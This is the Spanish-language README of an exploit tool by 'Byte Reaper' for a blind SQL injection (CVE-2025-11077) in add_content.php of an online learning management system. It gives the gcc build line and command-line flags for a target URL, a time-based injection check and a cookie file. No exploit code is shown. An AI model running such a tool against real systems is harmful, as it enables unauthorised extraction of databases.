
Explota la inyección SQL ciega en (Sistema de Gestión de Aprendizaje en Línea)
Autor: Byte Reaper
Esta vulnerabilidad es una Inyección SQL Ciega en el archivo add_content.php del Sistema de Gestión de Aprendizaje en Línea (CVE-2025-11077), que permite a un atacante extraer información de la base de datos enviando solicitudes POST manipuladas.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- AYUDA :
./CVE-2025-11077 -h
- URL objetivo (url base)
./CVE-2025-11077 -u http://[IP]
- archivo de registro :
./CVE-2025-11077 -f [FILE]
- Verificar inyección ciega basada en tiempo :
./CVE-2025-11077 -u http://[IP] -b
- Archivo de cookies :
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT